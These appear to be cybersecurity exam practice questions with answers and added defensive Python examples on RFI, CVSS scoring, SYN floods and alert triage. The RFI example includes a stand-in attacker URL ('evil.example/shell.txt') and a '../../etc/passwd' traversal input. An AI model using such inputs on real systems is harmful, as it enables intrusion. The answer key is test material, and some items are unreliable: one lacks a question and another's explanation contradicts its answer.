D. Implement a role-based access control system Role-based access control systems assign permissions based on predefined roles, ensuring that only authorized personnel can access sensitive data.

A cybersecurity analyst at a large organization is working on improving their techniques for identifying malicious activity in the company's network. The analyst is considering several methodologies and frameworks to help them achieve this objective. Which actions should the analyst prioritize to enhance their ability to detect and respond to potential threats? A. Deploy additional firewalls throughout the network B. Implement stronger password policies C. Conduct regular penetration testing of web applications D. Implement network traffic analysis and threat hunting

D. Implement network traffic analysis and threat hunting Network traffic analysis and threat hunting, guided by frameworks like Open Source Security Testing Methodology Manual (OSSTMM) and MITRE ATT&CK, can help the analyst identify potential malicious activity.

A healthcare facility tasked a cybersecurity analyst with recommending controls to mitigate successful application attacks. Which of the following controls should the analyst prioritize to help protect the application and prevent future attacks? A. Conducting regular vulnerability assessments B. Conducting a thorough code review C. Implementing remediation measures D. Implementing compensating controls

D. Implementing compensating controls Implementing compensating controls can help mitigate successful application attacks by addressing the specific risks and vulnerabilities that allowed the attacks to succeed.

A network reliability engineer for a commercial dairy company receives an alert from the sensor in refrigeration unit 7. It shows the cooler as 15 degrees higher than usual, and the backup refrigeration units are working at max capacity to control the increase in temperature. The engineer alerts the floor manager on shift to distribute inventory to nearby coolers and send a maintenance specialist to resolve the issue. What type of controls saved the company's inventory from a catastrophe? A. Regulatory requirements B. Security information and event management (SIEM) C. Action Plan D. Industrial control systems (ICSs)

D. Industrial control systems (ICSs) The industrial control system (ICS) in place stopped the inventory from spoiling and gave company employees the time necessary to respond to the problem at hand. In this scenario, the sensor was the ICS (a computer system designed to perform a specific, dedicated function).

A security administrator is testing their organization's database server, which services a publicly accessible web application server. The security administrator sends unexpected input combined with arbitrary commands to the web application to determine whether the database server is vulnerable. What kind of vulnerability is the security administrator testing? A. Cryptographic failures B. Broken access control C. Software and data integrity failures D. Injection flaws

D. Injection flaws The security administrator is testing injection flaws. Injection refers to inserting malicious code or commands into a program or system, such as a Structured Query Language (SQL) injection, allowing attackers to access or modify data they are not authorized to access or modify.

The attacker is using reflected cross-site scripting (XSS) to steal the user's session token. In reflected XSS, the malicious script gets reflected off a web application and executed in the victim's browser, with the malicious script embedded in the URL. A. Availability B. Confidentiality C. Privacy D. Integrity

D. Integrity The impact of a vulnerability considers the potential damage caused by successful exploitation and the effort required to mitigate it. Integrity issues extend to cases where the system's functionality is changed or impaired (e.g., modification of database records).

An organization tasked its cybersecurity team leader with addressing a security incident that requires immediate action. What steps should the team take to prevent additional damage to the systems as part of their security operations plan? A. Notify all employees B. Install security updates on all systems C. Conduct a security audit D. Isolate affected systems

D. Isolate affected systems Isolating the affected systems prevents the potential spread of the security threat, allowing the team to effectively remediate the issue and protect other systems in the organization.

An organization has tasked a cybersecurity analyst with training its security team on the importance of attack methodology frameworks. Which method is a key component of attack methodology frameworks when containing a threat during an ongoing attack? A. Data and log analysis B. Vulnerability assessment C. Penetration testing D. Isolation

D. Isolation Isolating affected systems or networks helps prevent the spread of an attack and minimizes potential damage. Organizations can better manage the incident by containing the threat and focusing on remediation efforts.

A security analyst is writing a script to automate security operations. However, the analyst is confused about which data format to use for the script: JSON or XML. Which data format should the analyst use for the script? A. XML B. TXT C. CSV D. JSON

D. JSON JavaScript Object Notation (JSON) is the preferred data format for scripting and automation tasks in security operations. JSON is lightweight, easy to parse, and widely supported. It is commonly used for exchanging data between web applications and provides better performance and flexibility compared to XML.

A security operations center (SOC) incident response analyst needs to know the entanglement of systems during an attack as quickly as possible. Therefore, the analyst needs a tool that can help quickly identify the relationships through visualization. Which tool could help the analyst investigate an emerging attack? A. Prowler B. ScoutSuite C. Nmap D. Maltego

D. Maltego Maltego is a very sophisticated visualization tool that helps investigators quickly identify relationships among entities of many types. As a result, Maltego can help in many investigations, from people and social engineering to malware analysis.

A network security engineer provided a report to the operations manager with a large amount of public information that is accessible solely from the company's website. For example, the report shows email addresses and other company phone numbers on a graph that would otherwise be known internally. What tool did the network security engineer most likely use to gather this information with little effort? A. Angry IP scanner B. Metasploit C. Recon-ng D. Maltego

D. Maltego Maltego is a visualization tool that gathers public information and presents it connected in a graph. It can research and map entities quicker than other tools.

Which security control category gives oversight of the information system? A. Operational B. Technical C. Preventative D. Managerial

D. Managerial Managerial controls (a control category) give oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.

A dog food manufacturing company's security team identified a malicious code injection in their system approximately 48 hours after the incident. It is roughly in line with the team's normal performance for this task. What metric does this indicate? A. Mean time to respond B. Mean time to remediate C. Alert volume D. Mean time to detect

D. Mean time to detect The mean time to detect is the average time it takes to identify a security incident or event. The team took 48 hours to detect the breach.

A bookcase restoration company has a compromised network, and the security team has ameliorated the situation via containment and restorative measures in 20 minutes. It is roughly in line with the team's normal performance for this task. What metric does this refer to? A. Alert volume B. Mean time to detect C. Mean time to respond D. Mean time to remediate

D. Mean time to remediate The mean time to remediate is the average time it takes to resolve or mitigate the impact of a security incident or event after the team has responded to it. It took 20 minutes to remediate.

An organization recently suffered a data breach and must focus on validating data integrity and implementing compensating controls. The IT security team will need to analyze network indicators to identify potential threats and improve security measures. Which of the following actions would be most appropriate for the security team to take in this situation? A. Implement a role-based access control system B. Conduct a thorough digital forensics investigation C. Utilize secure data backup and recovery procedures D. Monitor network traffic for unusual patterns

D. Monitor network traffic for unusual patterns Analyzing network indicators and monitoring network traffic for unusual patterns can help the security team identify potential threats, validate data integrity, and determine the effectiveness of compensating controls.

A small pet insurance company has just experienced a cyber attack. The incident response team finds that the IT auditing team may have been negligent in their systems administration according to the Payment Card Industry Data Security Standard (PCI DSS) standard. The incident response team has taken steps, including internal coordination, to contain and investigate the attack. What next step should the team consider in the incident response reporting process? A. Notify senior management B. Notify customers C. Notify Computer Emergency Readiness Team (CERT) D. Notify external regulatory authorities

D. Notify external regulatory authorities After containment and investigation, law enforcement reporting is the next step in the incident response reporting process. It must happen after senior management and internal stakeholders are tracking the situation.

A security analyst must identify and assess web application vulnerabilities. Which of the following frameworks is best suited for this task? A. Diamond Model of Intrusion Analysis B. Cyber kill chain C. MITRE ATT&CK D. OWASP Testing Guide

D. OWASP Testing Guide The Open Web Application Security Project (OWASP) Testing Guide provides a comprehensive methodology for identifying and assessing web application vulnerabilities.

The business's security operations center (SOC) is currently re-evaluating the yearly budget. They decided to use different alternatives, including reduced overhead spending and less intensive resources on the company's current systems. The SOC's final decision was to use a different scanning method that monitors and inspects the network traffic more thoroughly. What method of scanning best matches what the SOC has decided? A. Active B. Internal scanning C. External scanning D. Passive

D. Passive Passive scanning describes ways to identify vulnerabilities without directly interacting with a device or software. The primary example is network packet capture, which infers operating systems, services and software versions from traffic the hosts are already sending. Because no probes are sent, passive scanning cannot overload or crash fragile devices, but it only sees what appears on the wire during the capture window.

An organization has experienced a recent security breach, and the security team must identify the malicious activity that led to the breach. What should the team do first to determine the source of the breach effectively? A. Implement an intrusion detection system (IDS) B. Deploy an endpoint detection and response (EDR) tool C. Conduct a vulnerability assessment D. Perform a root cause analysis

D. Perform a root cause analysis By conducting a root cause analysis, the security team can identify the malicious activity that led to the breach and take appropriate measures to prevent similar incidents.

A company wants to extend the functionality of their website by adding new features such as social media integration, an online store, or a customer support chatbot. However, the company is concerned about the security implications of adding new features to their website and wants to ensure that any technology used is secure and does not introduce new vulnerabilities. What technology can the company use to achieve this goal in a secure manner? A. APIs B. SDNs C. Webhooks D. Plugins

D. Plugins Plugins are add-ons that extend the functionality of existing software or a system. The question treats them as the secure choice because a well-designed plugin architecture sandboxes each plugin and isolates it from the main application. In practice that isolation depends on the platform: many web platforms run plugins with the full privileges of the application, and third-party plugins are a frequent source of web application vulnerabilities, so each plugin still has to come from a trusted publisher, be reviewed before deployment and be kept patched.

What is the ultimate goal of a vulnerability assessment? A. Calculate the risk score B. Measure the affected hosts from a potential breach C. Replace primary security measures with compensating controls D. Prioritize vulnerabilities for mitigation based on risk and potential impact

D. Prioritize vulnerabilities for mitigation based on risk and potential impact A vulnerability assessment exists to drive remediation: the required mitigations in its report communicate what needs to be done, and in what order, to prevent the exploitation of the vulnerabilities it discovered.

A mid-size rose farm and distributor has experienced a security incident from a malicious USB drive, resulting in a significant data breach. The organization has taken measures to investigate and remediate the incident, but they want to ensure that the incident does not recur. What is the most appropriate step that the organization can take to reduce the likelihood of recurrence? A. Review mitigations required from previous attacks B. Measure the affected hosts C. Calculate the risk score D. Provide awareness training to all employees on the importance of securing peripheral devices, such as USBs

D. Provide awareness training to all employees on the importance of securing peripheral devices, such as USBs Awareness training regarding peripheral devices, such as USBs, is the best way to prevent recurrence in this case.

A small business has suffered a data breach resulting from an employee falling victim to a phishing email. The attacker was able to gain access to sensitive customer information and financial data. What could have helped prevent this breach? A. Implementing service-level objectives (SLOs) to ensure a reduction in breaches B. Providing awareness, education, and training on how to implement configuration management C. Implementing a zero-day tracker D. Providing awareness, education, and training on how to recognize and respond to phishing emails

D. Providing awareness, education, and training on how to recognize and respond to phishing emails Providing awareness, education, and training on how to recognize and respond to phishing emails is the best way to mitigate phishing attacks.

An attacker targets a web application and manipulates the URL to include a file path located on a separate server. Since the application does not properly validate the input, it executes the code residing in the remote file. As a result, the attacker can take control of the web application due to the code's execution. What type of vulnerability does this situation describe? A. LFI B. RCE C. XSS D. RFI

D. RFI Remote file inclusion (RFI) lets an attacker supply a URL so that the application loads and executes code from a server the attacker controls, whereas local file inclusion (LFI) reads or executes files that already reside on the target. The inclusion here is remote because the file resides on a separate system. Both stem from the same root cause: the file path or URL passed to an include function is built from unvalidated user input.
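The following is an added example, not code from the original page. It models the classic PHP anti-pattern of including a file named by a request parameter, labels what an unvalidated value would do (RFI, LFI or a normal page), and shows the allowlist-based fix. The `page` parameter, the `PAGES_ROOT` directory and the allowlist are assumptions for illustration.

```python
"""Added example: why unvalidated include paths lead to RFI/LFI, and the fix.

Mirrors the PHP anti-pattern   include($_GET['page'] . '.php');
The directory, allowlist and parameter names are hypothetical.
"""
from pathlib import Path
from urllib.parse import urlsplit

PAGES_ROOT = Path("/var/www/app/pages")           # assumed template directory
ALLOWED_PAGES = {"home", "contact", "schedule"}    # assumed allowlist of page names


def classify_include(param: str) -> str:
    """Label what an unvalidated include of `param` would do.

    RFI        - the value carries a URL scheme, so the code source is attacker
                 controlled (http://, ftp://; PHP stream wrappers such as data:
                 and php:// are grouped here because the fix is the same:
                 reject any scheme).
    LFI        - an absolute path, a traversal component or a NUL byte, which
                 reads or executes a file already on the target.
    local page - a bare page name, the only thing the application intended.
    """
    parts = urlsplit(param)
    if parts.scheme and len(parts.scheme) > 1:   # len > 1 excludes Windows drive letters
        return "RFI"
    if param.startswith("/") or ".." in Path(param).parts or "\x00" in param:
        return "LFI"
    return "local page"


def unsafe_include_target(param: str) -> str:
    """The vulnerable behaviour: whatever the client sent becomes the include path.

    With allow_url_include enabled, 'http://evil.example/shell.txt.php' is
    fetched and executed; '../../etc/passwd' is read from the local disk.
    """
    return f"{param}.php"


def safe_include_target(param: str) -> Path:
    """Hardened resolver: allowlist first, then confine the result to PAGES_ROOT."""
    if param not in ALLOWED_PAGES:
        raise ValueError(f"page not allowed: {param!r}")
    target = (PAGES_ROOT / f"{param}.php").resolve()
    # Defence in depth: even an allowlisted name must resolve inside the root,
    # so a later mistake in the allowlist cannot reintroduce traversal.
    if PAGES_ROOT.resolve() not in target.parents:
        raise ValueError("resolved path escaped the pages directory")
    return target


if __name__ == "__main__":
    for value in ("home", "../../etc/passwd", "http://evil.example/shell.txt"):
        print(f"{value!r:40} unvalidated -> {classify_include(value)}")
```

The allowlist does the real work; the `resolve()` check is a second layer so that the fix does not depend on string matching alone. Rejecting any URL scheme rather than just `http` and `https` is what closes the stream-wrapper variants.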

An analyst at a financial services company is conducting a review of several threat intelligence providers. If the analyst wants to ensure they can filter reports by industry, they are likely concerned about what attribute of threat intelligence? A. Timeliness B. Accuracy C. Open source D. Relevancy

D. Relevancy Relevancy refers to the usefulness of a piece of information concerning a specific threat. Relevant information is actionable and gives an organization meaningful context. Filtering information by the appropriate industry increases its relevancy.

A cyber security specialist has extracted source code from an unknown piece of software that is disrupting internal systems. The specialist uses a tool to identify the software methods and languages used and to inspect how the software operates. What technique does the cyber security specialist use to confirm it meets security requirements or to determine whether a threat actor has tampered with it? A. Vulnerability scan B. Map/discovery scan C. Device fingerprinting D. Reverse engineering

D. Reverse engineering Reverse engineering describes deconstructing software and/or hardware to determine how the developer created them.

A technology company has a data breach compromising employee and customer information. Which of the following steps should the incident response team take to determine the initial scope of the incident most efficiently? A. Perform a full forensic investigation of the affected systems B. Conduct interviews with affected employees and customers C. Conduct a vulnerability assessment of the affected systems D. Review system logs and access records

D. Review system logs and access records Reviewing system logs and access records is the most efficient way to determine the initial scope of a data breach. This information helps the incident response team identify the affected systems and data and the extent of the compromise before committing to a full forensic investigation.

A security analyst needs to determine the underlying cause of a security incident that recently occurred within the organization. Which method should the analyst use to identify the primary reason behind the incident? A. Forensic analysis B. Vulnerability assessment C. Penetration testing D. Root cause analysis

D. Root cause analysis Root cause analysis is a problem-solving method that aims to identify the fundamental reason behind an incident or issue. Using root cause analysis, the analyst can determine the primary cause of the security incident and develop appropriate remediation measures.

A security operations center (SOC) manager notices that analysts are performing a high volume of mundane tasks to resolve false positive alerts in the security information and events manager (SIEM). What could be implemented to help reduce this workload? A. Paid feeds B. Threat hunting C. A honeypot D. SOAR

D. SOAR Security orchestration, automation, and response (SOAR) automates well-documented, highly procedural actions taken in response to specific SIEM-generated alerts. When something triggers an alert, the system can analyze it by following a defined set of instructions.

A security engineer is assessing vulnerabilities in the organization's SSO solution. The engineer has found multiple vulnerabilities and discovered that, despite the exploit vectors and results being substantively similar, the CVSS scores differ significantly between the SSO and the NTP server. What is the most reasonable explanation for this phenomenon? A. SSO requires a more complex attack than an NTP server. B. NTP servers require a more sophisticated threat actor than SSO solutions. C. NTP server is a more valuable asset than SSO. D. SSO is a more valuable asset than an NTP server.

D. SSO is a more valuable asset than an NTP server. The most reasonable explanation for the difference in Common Vulnerability Scoring System (CVSS) scores is the asset value of the single sign-on (SSO) solution versus the Network Time Protocol (NTP) server. A CVSS base score describes only the vulnerability itself, so substantively similar exploit vectors and results produce similar base scores; the difference comes from the environmental metrics, where the organization's Confidentiality, Integrity and Availability Requirements (CR, IR, AR) raise the score for a high-value asset such as SSO and lower it for a low-value one such as NTP.
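The following is an added example, not code from the original page, implementing the CVSS v3.1 base and environmental formulas so the effect described above can be seen numerically. The constants and formulas follow the CVSS v3.1 specification; the vector string and the CR/IR/AR values chosen for the SSO and NTP assets are assumptions for illustration, and the temporal metrics are left at Not Defined (weight 1.0).

```python
"""Added example: CVSS v3.1 base vs environmental score for the same vector.

Same vulnerability, two assets: the organisation's requirement ratings
(CR/IR/AR) move the environmental score while the base score stays fixed.
"""
import math

# Metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
REQ = {"H": 1.5, "M": 1.0, "L": 0.5, "X": 1.0}   # CR / IR / AR (X = Not Defined)


def pr_weight(pr: str, scope_changed: bool) -> float:
    """Privileges Required depends on whether scope changes."""
    if pr == "N":
        return 0.85
    if pr == "L":
        return 0.68 if scope_changed else 0.62
    return 0.5 if scope_changed else 0.27


def roundup(x: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal value >= x (spec appendix A)."""
    i = round(x * 100000)
    return i / 100000 if i % 10000 == 0 else (math.floor(i / 10000) + 1) / 10


def parse_vector(vector: str) -> dict:
    """'CVSS:3.1/AV:N/AC:L/...' -> {'AV': 'N', 'AC': 'L', ...}"""
    return dict(part.split(":") for part in vector.split("/")[1:])


def impact_sub(iss: float, scope_changed: bool, environmental: bool) -> float:
    """Impact sub-score; v3.1 uses a different polynomial for the modified (environmental) case."""
    if not scope_changed:
        return 6.42 * iss
    if environmental:
        return 7.52 * (iss - 0.029) - 3.25 * (iss * 0.9731 - 0.02) ** 13
    return 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15


def exploitability(m: dict, scope_changed: bool) -> float:
    return 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr_weight(m["PR"], scope_changed) * UI[m["UI"]]


def combine(impact: float, expl: float, scope_changed: bool) -> float:
    if impact <= 0:
        return 0.0
    total = impact + expl
    return roundup(min(1.08 * total if scope_changed else total, 10))


def base_score(vector: str) -> float:
    m = parse_vector(vector)
    sc = m["S"] == "C"
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    return combine(impact_sub(iss, sc, environmental=False), exploitability(m, sc), sc)


def environmental_score(vector: str, cr: str = "X", ir: str = "X", ar: str = "X") -> float:
    """Environmental score with Modified Base metrics equal to the base metrics
    and temporal metrics (E, RL, RC) Not Defined, i.e. weight 1.0."""
    m = parse_vector(vector)
    sc = m["S"] == "C"
    miss = min(1 - (1 - REQ[cr] * CIA[m["C"]])
                   * (1 - REQ[ir] * CIA[m["I"]])
                   * (1 - REQ[ar] * CIA[m["A"]]), 0.915)
    inner = combine(impact_sub(miss, sc, environmental=True), exploitability(m, sc), sc)
    return roundup(inner * 1.0 * 1.0 * 1.0)   # x E x RL x RC, all Not Defined


if __name__ == "__main__":
    # Assumed vector: network-reachable, low complexity, low privileges, high C / low I impact.
    vec = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
    print("base              ", base_score(vec))
    print("SSO  (CR:H IR:H AR:M)", environmental_score(vec, "H", "H", "M"))
    print("NTP  (CR:L IR:L AR:M)", environmental_score(vec, "L", "L", "M"))
```

With the assumed vector the base score is 7.1 for both assets; rating the SSO solution high for confidentiality and integrity lifts its environmental score to 8.6, while rating the NTP server low drops it to 5.2. That gap, not a difference in the exploit, is what the engineer in the question is seeing.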

A company uses a default username and password for their router, and the login page is accessible from the internet. An attacker can guess the default credentials and gain privileged access to the router. What type of vulnerability does this situation describe? A. XSS B. Cryptographic failures C. Broken access control D. Security misconfiguration

D. Security misconfiguration Security misconfiguration refers to deploying a system in an insecure state, such as keeping default credentials, leaving unnecessary ports or services open, or exposing an administrative interface to the internet. Here two misconfigurations compound each other: the default password gives the attacker a known credential, and the internet-facing login page lets the attacker use it.

A cybersecurity analyst at a company notices an unusual spike in network traffic that leads to service interruptions. The analyst suspects that this may be due to a security breach. Why could these service interruptions be an indicator of a security breach? A. Service interruption is usually caused by power outages or hardware failures. B. Service interruption is often the result of user error, such as misconfiguration of network devices. C. Service interruption might be caused by routine maintenance tasks that require temporarily taking down the system. D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network.

D. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. Service interruption could indicate an attacker using a denial-of-service attack to overload the network. This is a common tactic used by attackers to disrupt the availability of a network service.

A cybersecurity team for a new manufacturing company is looking for a solution to consolidate their security monitoring tools into a simplified interface due to the large amount of data they need to review. Which term best describes this approach? A. Data enrichment B. Essential strategy C. Threat feed combination D. Single pane of glass

D. Single pane of glass A single pane of glass approach refers to the consolidation of security monitoring tools into a unified interface, allowing security teams to have a centralized view of their security posture.

A security analyst investigates a suspected network attack on a company's server. The analyst needs to capture and analyze network traffic to identify the source and type of attack. The analyst decides to use tcpdump and Wireshark for the analysis. Which of the following statements is true about tcpdump and Wireshark when used for network traffic analysis in a security investigation? A. Tcpdump is a network traffic capture tool that identifies the source and type of an attack, while Wireshark is a network traffic analysis tool that visualizes and filters captured traffic. B. Wireshark is a network traffic capture tool that identifies the source and type of an attack, while Tcpdump is a network traffic analysis tool that visualizes and filters captured traffic. C. Tcpdump and Wireshark are both network traffic analysis tools that can be used to visualize and filter captured traffic, but cannot be used to identify t

D. Tcpdump and Wireshark are both network traffic capture and analysis tools that identify the source and type of an attack. Tcpdump and Wireshark both capture and analyze network traffic, which lets the analyst identify the source and type of an attack. Tcpdump captures and displays traffic from the command line and writes pcap files; Wireshark offers a graphical interface with display filters and protocol dissectors for deep inspection of live or previously captured traffic, including tcpdump's pcap files. Neither tool identifies an attack by itself: the analyst does, by filtering the capture for the traffic pattern in question.
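The following is an added example, not code from the original page, tying this question to the earlier one on service interruptions: it parses constructed `tcpdump -n` output lines and computes, per source address, how many TCP handshakes were started versus completed, which is how a SYN flood stands out from legitimate clients. The capture lines, addresses and thresholds are constructed for illustration and are not from a real incident.

```python
"""Added example: SYN-flood triage over tcpdump output.

Parses lines as printed by `tcpdump -n` (constructed sample below) and tracks
the TCP three-way handshake per client so that sources sending many SYNs but
never completing a connection can be flagged.
"""
import re
from collections import Counter

# Constructed sample (not a real capture). 198.51.100.10 is the assumed web
# server; 203.0.113.7 sends SYNs from rotating source ports and never ACKs the
# SYN/ACK, while 192.0.2.25 completes a normal handshake.
SAMPLE_TCPDUMP = """\
12:00:01.000100 IP 203.0.113.7.40001 > 198.51.100.10.443: Flags [S], seq 1, win 1024, length 0
12:00:01.000200 IP 203.0.113.7.40002 > 198.51.100.10.443: Flags [S], seq 1, win 1024, length 0
12:00:01.000300 IP 192.0.2.25.51515 > 198.51.100.10.443: Flags [S], seq 100, win 64240, length 0
12:00:01.000400 IP 198.51.100.10.443 > 192.0.2.25.51515: Flags [S.], seq 200, ack 101, win 65160, length 0
12:00:01.000500 IP 192.0.2.25.51515 > 198.51.100.10.443: Flags [.], ack 201, win 64240, length 0
12:00:01.000600 IP 203.0.113.7.40003 > 198.51.100.10.443: Flags [S], seq 1, win 1024, length 0
12:00:01.000700 IP 203.0.113.7.40004 > 198.51.100.10.443: Flags [S], seq 1, win 1024, length 0
12:00:01.000800 IP 198.51.100.10.443 > 203.0.113.7.40001: Flags [S.], seq 300, ack 2, win 65160, length 0
12:00:01.000900 IP 203.0.113.7.40005 > 198.51.100.10.443: Flags [S], seq 1, win 1024, length 0
"""

# tcpdump -n prints "src.port > dst.port: Flags [..]"; [S] = SYN, [S.] = SYN/ACK, [.] = ACK.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]*)\]"
)


def handshake_stats(capture: str) -> dict:
    """Return {client_ip: (syns_sent, handshakes_completed)}."""
    syns, completed = Counter(), Counter()
    awaiting_ack = set()   # (client, cport, server, sport) that received a SYN/ACK
    for line in capture.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # non-TCP or unparsed line; ignore
        src, sport, dst, dport, flags = m["src"], m["sport"], m["dst"], m["dport"], m["flags"]
        if flags == "S":                        # client opens a connection
            syns[src] += 1
        elif flags == "S.":                     # server answers; remember the client socket
            awaiting_ack.add((dst, dport, src, sport))
        elif flags == "." and (src, sport, dst, dport) in awaiting_ack:
            completed[src] += 1                 # third packet: handshake done
            awaiting_ack.discard((src, sport, dst, dport))
    return {src: (syns[src], completed[src]) for src in syns}


def suspicious_sources(stats: dict, min_syns: int = 3, max_completion: float = 0.5) -> list:
    """Sources that sent at least `min_syns` SYNs but completed few of them."""
    flagged = []
    for src, (sent, done) in stats.items():
        if sent >= min_syns and done / sent <= max_completion:
            flagged.append(src)
    return sorted(flagged, key=lambda s: -stats[s][0])


if __name__ == "__main__":
    stats = handshake_stats(SAMPLE_TCPDUMP)
    for src, (sent, done) in stats.items():
        print(f"{src:15} SYNs={sent} completed={done}")
    print("suspicious:", suspicious_sources(stats))
```

On the wire the same question is asked with a capture filter such as `tcpdump -n 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn'` (SYNs only) and, in Wireshark, the display filter `tcp.flags.syn == 1 && tcp.flags.ack == 0` followed by Statistics > Conversations to see which source dominates.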

An Information Systems Security Officer (ISSO) received a report about secure shell (SSH) access to a network device and quickly reported it up the chain of command. SSH is normally prohibited since a central networking management application manages the network devices. However, the next day, the operations manager addressed the case as a false-positive and confirmed the network team's tasks with an official end date. Why did the operations manager conclude that the security event was false-positive? A. The network team has an indefinite exemption. B. The network team did not have an approved exemption. C. The network devices are exempt from security scans. D. The network team has a temporary exemption.

D. The network team has a temporary exemption. Concluding that the event was a false positive means the secure shell (SSH) access was legitimate, if only for a defined period. The operations manager's confirmation of the network team's tasks together with an official end date shows the SSH access is covered by a temporary exemption; an exemption without an end date would be option A, and the manager would not have closed the event as a false positive if no approved exemption existed.
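The following is an added example, not code from the original page, serving both the SOAR question above and this exemption scenario: a small triage playbook of the kind a SOAR platform would run on SIEM alerts. It closes alerts that match an approved, time-bounded exemption or a known authorized scanner, escalates everything else, and refuses to load an exemption that has no end date. The rule names, addresses, exemption register entries and alerts are all constructed for illustration.

```python
"""Added example: a SOAR-style triage playbook for SIEM alerts.

Codifies the procedural checks an analyst repeats by hand: is the source an
approved scanner, and is there an approved exemption that is still in force?
Everything else is escalated. All data below is constructed.
"""
import ipaddress
from datetime import datetime

KNOWN_SCANNERS = {"10.0.0.5"}   # assumed: the authorised vulnerability scanner

# Assumed exemption register. Every entry must carry an end date (validated below).
EXEMPTIONS = [
    {"rule": "SSH_TO_NETWORK_DEVICE", "source": "10.0.10.0/24", "owner": "network-team",
     "ticket": "CHG-1042", "starts": "2024-03-01T00:00:00Z", "ends": "2024-03-08T00:00:00Z"},
]

# Constructed SIEM alerts.
ALERTS = [
    {"id": 1, "rule": "SSH_TO_NETWORK_DEVICE", "src": "10.0.10.7", "dst": "10.0.1.1", "time": "2024-03-05T14:02:00Z"},
    {"id": 2, "rule": "SSH_TO_NETWORK_DEVICE", "src": "10.0.10.7", "dst": "10.0.1.1", "time": "2024-03-09T09:15:00Z"},
    {"id": 3, "rule": "SSH_TO_NETWORK_DEVICE", "src": "192.168.50.3", "dst": "10.0.1.1", "time": "2024-03-05T14:03:00Z"},
    {"id": 4, "rule": "PORT_SCAN", "src": "10.0.0.5", "dst": "10.0.1.1", "time": "2024-03-05T14:05:00Z"},
]


def _ts(value: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp; the Z suffix is rewritten for older Pythons."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def validate_exemption(ex: dict) -> dict:
    """Reject open-ended exemptions: a temporary exemption needs an approved end date."""
    for key in ("rule", "source", "owner", "ticket", "starts", "ends"):
        if not ex.get(key):
            raise ValueError(f"exemption missing {key!r}")
    if _ts(ex["ends"]) <= _ts(ex["starts"]):
        raise ValueError("exemption end must be after its start")
    return ex


def triage(alert: dict, exemptions: list) -> dict:
    """Return a disposition for one alert following the fixed playbook order."""
    when = _ts(alert["time"])
    src = ipaddress.ip_address(alert["src"])

    # Step 1: known authorised scanner activity is expected noise.
    if alert["rule"] == "PORT_SCAN" and alert["src"] in KNOWN_SCANNERS:
        return {"alert": alert["id"], "disposition": "closed", "reason": "authorised scanner"}

    # Step 2: an approved exemption that is in force at the time of the alert.
    for ex in exemptions:
        if (ex["rule"] == alert["rule"]
                and src in ipaddress.ip_network(ex["source"])
                and _ts(ex["starts"]) <= when < _ts(ex["ends"])):
            return {"alert": alert["id"], "disposition": "closed",
                    "reason": f"temporary exemption {ex['ticket']} until {ex['ends']}"}

    # Step 3: anything else goes to a human.
    return {"alert": alert["id"], "disposition": "escalate", "reason": "no matching exemption"}


def run_playbook(alerts: list, exemptions: list) -> list:
    validated = [validate_exemption(ex) for ex in exemptions]
    return [triage(a, validated) for a in alerts]


if __name__ == "__main__":
    for result in run_playbook(ALERTS, EXEMPTIONS):
        print(result)
```

Alert 1 is closed against the exemption, alert 2 from the same source is escalated because it arrives after the end date, and alert 3 is escalated because its source is outside the exempted range. Tying every exemption to a ticket and an end date is what lets the automation close the SSH alert safely and what turns the expired exemption back into a real finding.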

A company has just experienced a data breach, and the incident response team needs to create a timeline for the incident. Which of the following is the most important factor to consider when creating the timeline? A. The time of day the attack occurred B. The type of attack that was used C. The length of time the attack lasted D. The order of events during the attack

D. The order of events during the attack A timeline that accurately reflects the order of events during the attack is critical to understanding how the attacker moved and to identifying the weaknesses in the organization's security posture that each step exploited. Getting the order right means normalizing every log source to a single time zone and correcting for clock skew between hosts before sorting, otherwise a fast or slow clock can make cause appear to follow effect.
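The following is an added example, not code from the original page: it builds an incident timeline from three constructed log sources with different timestamp formats, time zones and a known clock skew, and shows how the order changes once the skew is corrected. The log lines, the workstation's local time zone and its 90-second clock error are assumptions made for the illustration.

```python
"""Added example: ordering events from heterogeneous logs into one UTC timeline.

Three constructed sources: a firewall logging in UTC, a web server logging in
Apache format with an explicit offset, and a Windows workstation logging in
local time (assumed US Eastern, UTC-5) with a clock assumed to run 90 s fast.
"""
import re
from datetime import datetime, timedelta, timezone

UTC = timezone.utc
SOURCE_TZ = {"windows": timezone(timedelta(hours=-5))}   # assumed local zone of WS-042
CLOCK_SKEW = {"windows": timedelta(seconds=90)}          # assumed: WS-042 clock is 90 s fast

# Constructed log lines (not from a real incident).
FIREWALL_LOG = [
    "2024-03-05T14:02:03Z fw01 ACCEPT tcp 203.0.113.7:51422 -> 10.0.1.20:3389",
]
WEB_LOG = [
    '10.0.1.20 - - [05/Mar/2024:14:02:09 +0000] "GET /admin/export.php?all=1 HTTP/1.1" 200 48213',
]
WINDOWS_LOG = [
    "03/05/2024 09:03:35 AM WS-042 EventID=4624 LogonType=10 User=jsmith Src=203.0.113.7",
]


def parse_firewall(line: str) -> datetime:
    """'2024-03-05T14:02:03Z ...' -> aware UTC datetime."""
    return datetime.strptime(line[:20], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=UTC)


def parse_web(line: str) -> datetime:
    """Apache '[05/Mar/2024:14:02:09 +0000]' -> aware datetime via %z."""
    m = re.search(r"\[(.+?)\]", line)
    return datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z")


def parse_windows(line: str, correct_skew: bool = True) -> datetime:
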